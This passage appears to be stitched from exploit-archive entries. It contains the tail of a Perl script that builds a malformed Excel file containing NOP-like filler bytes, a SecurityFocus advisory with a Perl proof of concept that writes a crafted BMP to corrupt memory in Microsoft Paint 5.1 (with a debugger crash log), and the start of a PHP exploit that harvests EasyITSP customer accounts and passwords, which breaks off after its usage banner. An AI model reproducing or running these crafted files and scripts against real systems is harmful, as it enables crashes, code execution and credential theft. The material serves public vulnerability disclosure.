"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xFE\xFF\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xE0\x85\x9F\xF2".
"\xF9\x4F\x68\x10\xAB\x91\x08\x00\x2B\x27\xB3\xD9\x30\x00\x00\x00".
"\xC0\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x48\x00\x00\x00".
"\x04\x00\x00\x00\x50\x00\x00\x00\x08\x00\x00\x00\x64\x00\x00\x00".
"\x12\x00\x00\x00\x7C\x00\x00\x00\x0B\x00\x00\x00\x94\x00\x00\x00".
"\x0C\x00\x00\x00\xA0\x00\x00\x00\x0D\x00\x00\x00\xAC\x00\x00\x00".
"\x13\x00\x00\x00\xB8\x00\x00\x00\x02\x00\x00\x00\xE4\x04\x00\x00".
"\x1E\x00\x00\x00\x0B\x00\x00\x00\x41\x6D\x62\x65\x72\x20\x48\x65".
"\x73\x73\x00\x00\x1E\x00\x00\x00\x10\x00\x00\x00\x4B\x65\x6E\x6E".
"\x65\x74\x68\x20\x4C\x2E\x20\x48\x65\x73\x73\x00\x1E\x00\x00\x00".
"\x10\x00\x00\x00\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x45\x78".
"\x63\x65\x6C\x00\x40\x00\x00\x00\x80\x8A\x1B\xF3\xAA\x71\xBE\x01".
"\x40\x00\x00\x00\x80\xD3\x97\x2A\x71\x63\xBE\x01\x40\x00\x00\x00".
"\x80\xD1\x7E\x9C\x9C\x87\xC2\x01\x03\x00\x00\x00\x00\x00\x00\x00";

$crafted .= "\x00" x 3856;

$crafted .=

"\xFE\xFF\x00\x00\x05\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\xD5\xCD\xD5".
"\x9C\x2E\x1B\x10\x93\x97\x08\x00\x2B\x2C\xF9\xAE\x30\x00\x00\x00".
"\xC0\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x38\x00\x00\x00".
"\x0F\x00\x00\x00\x40\x00\x00\x00\x0B\x00\x00\x00\x64\x00\x00\x00".
"\x10\x00\x00\x00\x6C\x00\x00\x00\x0D\x00\x00\x00\x74\x00\x00\x00".
"\x0C\x00\x00\x00\x9C\x00\x00\x00\x02\x00\x00\x00\xE4\x04\x00\x00".
"\x1E\x00\x00\x00\x1A\x00\x00\x00\x44\x65\x6C\x6C\x20\x43\x6F\x6D".
"\x70\x75\x74\x65\x72\x20\x43\x6F\x72\x70\x6F\x72\x61\x74\x69\x6F".
"\x6E\x00\x53\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00".
"\x00\x00\x00\x00\x1E\x10\x00\x00\x01\x00\x00\x00\x1C\x00\x00\x00".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x00\x0C\x10\x00\x00".
"\x02\x00\x00\x00\x1E\x00\x00\x00\x0B\x00\x00\x00\x57\x6F\x72\x6B".
"\x73\x68\x65\x65\x74\x73\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00";

$crafted .= "\x00" x 3856;

$crafted .=

"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00".
"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00".
"\x09\x00\x00\x00\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00".
"\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00".
"\xFE\xFF\xFF\xFF\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00".
"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00".
"\xFE\xFF\xFF\xFF\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00".
"\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00".
"\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF";

$crafted .= "\xFF" x 368;

$crafted .=

"\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00".
"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x16\x00\x05\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x02\x00\x00\x00".
"\x10\x08\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC0\xD4\xD3\x05".
"\xC1\xA6\xCD\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00".
"\x42\x00\x6F\x00\x6F\x00\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x0A\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x8C\x21\x00\x00\x00\x00\x00\x00".
"\x05\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00".
"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00".
"\x69\x00\x6F\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x28\x00\x02\x01\x01\x00\x00\x00\x03\x00\x00\x00\xFF\xFF\xFF\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x11\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00".
"\x05\x00\x44\x00\x6F\x00\x63\x00\x75\x00\x6D\x00\x65\x00\x6E\x00".
"\x74\x00\x53\x00\x75\x00\x6D\x00\x6D\x00\x61\x00\x72\x00\x79\x00".
"\x49\x00\x6E\x00\x66\x00\x6F\x00\x72\x00\x6D\x00\x61\x00\x74\x00".
"\x69\x00\x6F\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x38\x00\x02\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x19\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00";

open(C, ">:raw", "crafted.xls");
print C $crafted;
close(C);
 
# http://0xffe4.org
            
source: https://www.securityfocus.com/bid/56311/info

Microsoft Paint is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application. Due to the nature of the issue code execution might be possible, but it has not been confirmed.

Microsoft Paint 5.1 is affected; other versions may also be vulnerable. 

#!/usr/bin/perl
#Title    :  Microsoft Paint 5.1 memory corruption
#Version  :  build 2600.xpsp Service Pack3
#Date     :  2012-10-21
#Vendor   :  http://www.microsoft.com
#Impact   :  Med/High
#Contact  :  coolkaveh [at] rocketmail.com
#Twitter  :  @coolkaveh
#tested   :  XP SP3 ENG
#Author   :  coolkaveh
#######################################################################################################
#Notice : for testing POC please run the Microsoft Pain under a
debugger and then open the POC file.
#----
#Bug :
#----
#Memory corruption during the handling of the bmp files a
context-dependent attacker can execute arbitrary code.
#######################################################################################################
#(844.cc4): Break instruction exception - code 80000003 (first chance)
#eax=7ffda000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=00faffcc ebp=00fafff4 iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
#*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\ntdll.dll -
#ntdll!DbgBreakPoint:
#7c90120e cc              int     3
#0:005> g
#(844.e20): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=000cab68 ebx=00000000 ecx=00000276 edx=000009d8 esi=000d5589 edi=000cab68
#eip=77f2f118 esp=0007ef30 ebp=0007efb0 iopl=0         nv up ei pl nz na po nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\GDI32.dll -
#GDI32!DdEntry11+0x44:
#77f2f118 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
#0:000> k
#*** ERROR: Module load completed but symbols could not be loaded for
C:\WINDOWS\system32\mspaint.exe
#ChildEBP RetAddr
#WARNING: Stack unwind information not available. Following frames may be wrong.
#0007efb0 0101235e GDI32!DdEntry11+0x44
#0007f024 0100a666 mspaint+0x1235e
#0007f04c 0102284e mspaint+0xa666
#0007f07c 01022af6 mspaint+0x2284e
#*** ERROR: Symbol file could not be found.  Defaulted to export
symbols for C:\WINDOWS\system32\MFC42u.DLL -
#0007f100 5f801bc5 mspaint+0x22af6
#0007f120 5f801b36 MFC42u!Ordinal6370+0x22
#0007f180 5f802f6c MFC42u!Ordinal1108+0x91
#0007f1a4 5f810971 MFC42u!Ordinal5801+0x34
#0007f210 5f81424a MFC42u!Ordinal3944+0x5b
#0007f2b0 7c911066 MFC42u!Ordinal5190+0x14d
#0007f2b4 7c9101bb ntdll!wcsncpy+0xb07
#0007f2c8 7c910202 ntdll!RtlAllocateHeap+0x117
#0007f2f4 7c910202 ntdll!RtlAllocateHeap+0x15e
#0007f2f8 7c91017b ntdll!RtlAllocateHeap+0x15e
#0007f2fc 7c9101bb ntdll!RtlAllocateHeap+0xd7
#0007f300 00000000 ntdll!RtlAllocateHeap+0x117
#####################################################################################################################
my $poc =
"\x42\x4D\x4E\x0A\x00\x00\x00\x00\x00\x00\xC7\xBD\x00\x00\x28\x00\x00\x00\x46\x00\x00\x00\x46\x00\x00".
"\x00\x01\x00\x04\x00\x00\x00\x00\x00\xD8\x09\x00\x00\xC4\x0E\x00\x00\xC4\x0E\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80".
"\x00\x80\x00\x80\x80\x00\x00\x80\x80\x80\x00\xC0\xC0\xC0\x00\x00\x00\xFF\x00\x00\xFF\x00\x00\x00\xFF".
"\xFF\x00\xFF\x00\x00\x00\xFF\x00\xFF\x00\xFF\xFF\x00\x00\xFF\xFF\xFF\x00\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x88\x87\x78\x88\x88\x88\x88\x87\x88\x88\x88\x88\x88".
"\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\x88\x88\x88\x88\x88\xFF\x87\x70\x77\x71".
"\x77\x77\x77\x77\x77\x72\x78\x88\x77\x07\x88\x77\x77\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF".
"\xFF\xFF\xFF\xFF\x88\x8F\xF8\xFF\xFF\x7F\xFF\xF7\x8F\x07\xF7\x8F\xF8\x07\x88\xFF\xF0\x78\xFF\x87\x77".
"\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\x88\xFF\x88\x8F\xFF\xFF\x8F\xF8\x87\x8F\x7F".
"\xF7\xFF\x8F\x80\x8F\xFF\xF7\x8F\xF8\xFF\x07\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xF8".
"\x8F\xF8\x88\x8F\xFF\x77\x8F\xF8\x84\x8F\xFF\xF7\xFF\x08\xF7\xFF\x7F\xF7\xFF\x47\x8F\x76\x00\x88\x88".
"\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x8F\x88\x88\x8F\xFF\x77\x8F\xFF\xF7\x8F\xFF\xF7\xFF\x08".
"\xF7\xF8\x0F\xF7\xF8\x07\x7F\x77\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88".
"\x8F\xFF\x77\x8F\x87\x77\x8F\xF8\xF7\xFF\x7F\xF7\xFF\x07\x87\xFF\x77\x8F\x77\x00\x88\x88\x88\x88\x88".
"\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\x88\x88\x88\x8F\xFF\x77\xFF\xFF\xF8\x8F\x78\xF7\xFF\xFF\x87\xFF\x87".
"\x74\x8F\xFF\xF8\x78\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88\x88\x8F\xFF\x78".
"\xFF\x88\x87\x88\x8F\xF8\xFF\x88\x8F\xFF\xFF\xF7\x7F\xF8\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
"\xFF\xFF\xFF\xFF\x88\x88\x88\x88\x8F\xF8\x7F\xFF\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x87\xFF\xFF".
"\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x88\x88\x8F\xFF\xFF\xF8\x88\x88".
"\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF".
"\x88\x88\x88\x88\x88\x88\xFF\xFF\x8F\x87\x77\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00".
"\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xF8\x88\x88\x88\x88\xFF\xFF\x88\x87\x77\x77\x8F\xFF".
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xF8".
"\x88\x88\x8F\xFF\xFF\x88\x87\x77\x77\x78\xFF\xFF\xFF\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88".
"\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xF8\x88\x88\xFF\xFF\xF8\x88\x88\x87\x77\x77\xFF\xFF\x8F\xFF".
"\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88\x8F\xFF".
"\xFF\xF8\x88\x88\x88\x88\x77\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x00\x88\x88\x88\x88\x88\x88".
"\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x8F\xFF\xFF\xFF\x88\x88\x77\x88\x88\x87\x8F\xFF\xFF\xFF\xFF\xFF\xFF".
"\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\x88\x88\x88\xFF\xFF\xFF\xFF\xF8\x88\x88".
"\x78\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F".
"\xFF\x88\x88\xFF\xFF\xFF\xF8\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF".
"\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\x88\x8F\xFF\xFF\xF8\xF8\x88\x88\x88\x87\x88\x88\x88".
"\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\x8F\xFF".
"\xFF\xF8\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88".
"\x88\x88\x88\x88\x88\x88\x88\x8F\xF8\xF8\x88\x88\x88\x88\x87\x31\x78\x88\x77\x77\x88\x88\x88\x88\xFF".
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x8F\x88\x87\x88\x88\x88".
"\x88\x87\x33\x77\x77\x77\x88\x88\x88\x88\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\xFF\x88\x77\x88\x88\x88\x88\x88\x87\x33\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF".
"\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\x88\x88".
"\x87\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x17\x78\x88\x88\x88\x88\x88\x88\x88\x77\x77\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF".
"\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x37\x78\x88\x88\x88\x88\x88\x88\x88\x87\x77".
"\x88\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x8F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88".
"\x00\x88\x88\x88\x88\x88\x88\x88\x88\xF8\x78\x87\x17\x77\x77\x77\x88\x88\x88\x88\x88\x87\x78\x88\x88".
"\x88\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x78\x87\x77\x78".
"\x88\x77\x77\x88\x88\x88\x88\x88\x78\x88\x88\x77\x7F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88".
"\x88\x88\x88\x88\x88\x88\xF8\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x88\x87\x77\x78\xF8".
"\x8F\xFF\xFF\xFF\xFF\xFF\xFF\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x87\x87\x77\x77\x78\xF8\xFF\xFF\xFF\xFF\xFF\xFF\xF8\x88\x00\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x78\x88\xFF\xFF\xFF".
"\xFF\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x88\x88".
"\x88\x88\x87\x78\x88\x77\x88\xFF\xFF\xFF\xFF\xFF\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x88\x87\x78\x88\xF8\xFF\xFF\xFF\xF8\x88\x88".
"\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77".
"\x88\x87\x78\x88\x8F\xFF\xFF\xFF\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x77\x88\x88\x88\x88\x88\x88\x87\x78\x87\x88\x88\x88\x8F\xF8\x88\x88\x88\x88\x88\x88\x88\x00".
"\x88\x88\x88\x88\x88\x88\x88\x8F\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x88\x77\x88\x77".
"\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x77\x77\x78\x88\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x88\x87\x77\x78\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x87\x77\x78\x88\x87\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x78".
"\x88\x88\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x88\x78\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x77\x77\x77\x77\x88\x88\x88\x78\x77\x78\x88\x88\x88".
"\x77\x87\x87\x88\x87\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x70\x77".
"\x00\x77\x88\x88\x88\x78\x87\x77\x78\x88\x88\x78\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x00\x88\x88\x88\x88\x88\x77\x88\x87\x31\x17\x78\x88\x88\x88\x77\x60\x70\x37\x88\x87\x77\x77\x87".
"\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x88\x87\x77\x77\x88\x88".
"\x88\x88\x71\x17\x17\x78\x88\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88".
"\x88\x88\x88\x88\x77\x78\x87\x78\x88\x88\x88\x88\x87\x88\x87\x88\x88\x87\x77\x77\x77\x77\x77\x78\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x77\x78\x88\x88\x88\x88\x88\x88\x88\x77".
"\x88\x88\x88\x87\x77\x87\x77\x37\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88".
"\x88\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x77\x78\x88\x77\x77\x77\x73\x37\x78\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x77\x77\x77\x73\x17\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77".
"\x88\x88\x88\x88\x88\x88\xF8\x88\x88\x88\x87\x77\x77\x77\x71\x13\x77\x78\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77".
"\x11\x13\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x73\x13\x37\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x00\x88\x88\x88\x88\x88\x88\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x33\x37\x77\x37".
"\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x77\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x87\x77\x77\x77\x33\x33\x73\x77\x38\x88\x88\x78\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88".
"\x88\x88\x88\x87\x87\x78\x88\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x73\x37\x37\x33\x37\x78\x87".
"\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x87\x77\x88\x88\x88\x88\x88\x88\x88\x88".
"\x77\x77\x77\x73\x73\x77\x77\x73\x37\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88".
"\x88\x88\x77\x77\x88\x88\x88\x88\x88\x88\x87\x77\x77\x77\x77\x37\x77\x73\x33\x37\x78\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x87\x77\x78\x88\x88\x88\x88\x88\x77\x77\x77\x77".
"\x77\x77\x77\x33\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88".
"\x77\x77\x77\x88\x88\x88\x77\x77\x77\x77\x77\x77\x77\x31\x11\x33\x77\x88\x78\x88\x88\x88\x88\x88\x88".
"\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x78\x77\x77\x77\x77\x77\x33\x37\x77\x73\x11".
"\x13\x13\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x73".
"\x77\x73\x37\x77\x77\x77\x33\x33\x33\x31\x11\x11\x13\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00".
"\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x73\x77\x73\x13\x77\x77\x73\x33\x33\x31\x33\x33\x33\x37\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x87\x77\x77\x73\x77\x77\x33".
"\x37\x77\x73\x11\x11\x11\x33\x33\x33\x77\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88".
"\x88\x88\x88\x88\x77\x87\x77\x77\x77\x77\x73\x33\x77\x11\x11\x11\x13\x33\x33\x33\x38\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x77\x77\x77\x37\x77\x77\x11\x17\x71\x10".
"\x00\x33\x33\x33\x33\x33\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\xF8\x88".
"\x88\x87\x77\x77\x37\x77\x73\x33\x77\x31\x10\x00\x01\x33\x33\x33\x33\x78\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\xF8\x88\x87\x77\x17\x77\x77\x77\x77\x73\x11\x11\x11\x11\x11".
"\x11\x33\x37\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x77".
"\x77\x87\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x78\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x00\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88".
"\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00".
open(C, ">:raw", "poc.bmp");
print C $poc;
close(C);
            
source: https://www.securityfocus.com/bid/56321/info

EasyITSP is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and gain unauthorized access to customer's information.

EasyITSP 2.0.2 is vulnerable; other versions may also be affected. 

<?php
error_reporting(0);
$arguments = getopt("a:b:c:");
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2   '."\n";
echo '## Discovery users with passwords  		 	 '."\n";
echo '##						 	 '."\n";
echo '## Author: Michal Blaszczak 			 	 '."\n";
echo '## Website: blaszczakm.blogspot.com	         	 '."\n";
echo '## Date: 10.10.2012				  	'."\n";
echo '##						 	 '."\n";
echo '## Greatz: cond, packet, jestemka1pi, sid, chez            '."\n";
echo '##         #pakamera@freenode 				'."\n";
echo '##         (old) #2600@ircnet 				'."\n";
echo '##         (old) #mamo_mamo_jestem_chakerem@ircnet	'."\n";
echo '##						  	'."\n";
echo '## Usage:						  	'."\n";
echo '## php exploit.php -a URL -b ID_START -c ID_STOP     	'."\n";
echo '##						  	'."\n";
echo '## Example:					  	'."\n";
echo '## php exploit.php -a http://lemens-ts.com/easyitsp/customer/ -b
5 -c 10'."\n";




exit;
}
